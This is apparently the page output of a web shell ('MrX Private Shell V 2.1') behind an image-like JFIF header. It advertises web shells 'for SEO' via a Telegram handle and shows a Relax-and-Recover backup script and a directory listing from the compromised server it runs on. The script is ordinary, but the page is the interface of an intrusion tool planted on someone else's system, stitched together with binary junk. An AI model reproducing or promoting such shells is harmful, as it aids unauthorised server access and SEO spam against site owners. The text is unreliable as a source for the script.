����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 960_collect_MC_serviceguard_infos.sh
# Purpose of this script is to gather MC/SG related config files
# in order to prepare a smooth rolling upgrade
# List files and directories in SGLX_FILES
SGLX_FILES="/etc/hostname
/etc/vconsole.conf
/etc/locale.conf
/etc/sysconfig/keyboard
/etc/sysconfig/network-scripts/ifcfg*
/etc/sysconfig/network/ifcfg*
/etc/sysconfig/network
/etc/hosts
/etc/modprobe.conf
/etc/modules.conf
/etc/cmcluster.conf
/etc/hp_qla2x00.conf
/etc/lpfc.conf
/etc/ntp.conf
/etc/resolv.conf
/usr/local/cmcluster/conf/*/*
/opt/cmcluster/conf/*/*"
# Phase 1 : does sglx soft is installed?
# on RH path is /usr/local/cmcluster; on SUSE path is /opt/cmcluster
[ -d /usr/local/cmcluster/conf -o -d /opt/cmcluster/conf ] || return 0
# Phase 2: create a /etc/rear/recovery/sglx directory
mkdir -p $v -m755 "$VAR_DIR/recovery/sglx" >&2
StopIfError "Could not create sglx configuration directory: $VAR_DIR/recovery/sglx"
SGLX_DIR="$VAR_DIR/recovery/sglx"
for sgf in $SGLX_FILES
do
if [ `dirname ${sgf}` != . ]; then
mkdir -p $v ${SGLX_DIR}/`dirname ${sgf}` >&2
fi
if [ -f ${sgf} ]; then
cp $v ${sgf} ${SGLX_DIR}${sgf} >&2
fi
done
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 220_load_modules_from_initrd.sh | File | 1.3 KB | 0644 |
|
| 230_storage_and_network_modules.sh | File | 1.7 KB | 0644 |
|
| 240_kernel_modules.sh | File | 1.08 KB | 0644 |
|
| 250_udev.sh | File | 449 B | 0644 |
|
| 260_collect_initrd_modules.sh | File | 295 B | 0644 |
|
| 260_storage_drivers.sh | File | 114 B | 0644 |
|
| 290_kernel_cmdline.sh | File | 3.43 KB | 0644 |
|
| 295_configure_ramdisk_rootfs.sh | File | 542 B | 0644 |
|
| 300_dns.sh | File | 267 B | 0644 |
|
| 310_network_devices.sh | File | 36.46 KB | 0644 |
|
| 320_inet6.sh | File | 121 B | 0644 |
|
| 350_routing.sh | File | 3.65 KB | 0644 |
|
| 390_check_usb_modules.sh | File | 270 B | 0644 |
|
| 410_use_xen_console.sh | File | 222 B | 0644 |
|
| 500_clone_keyboard_mappings.sh | File | 6.97 KB | 0644 |
|
| 550_copy_ldconfig.sh | File | 307 B | 0644 |
|
| 950_cfg2html.sh | File | 1 KB | 0644 |
|
| 960_collect_MC_serviceguard_infos.sh | File | 1.12 KB | 0644 |
|
| 990_sysreqs.sh | File | 3.91 KB | 0644 |
|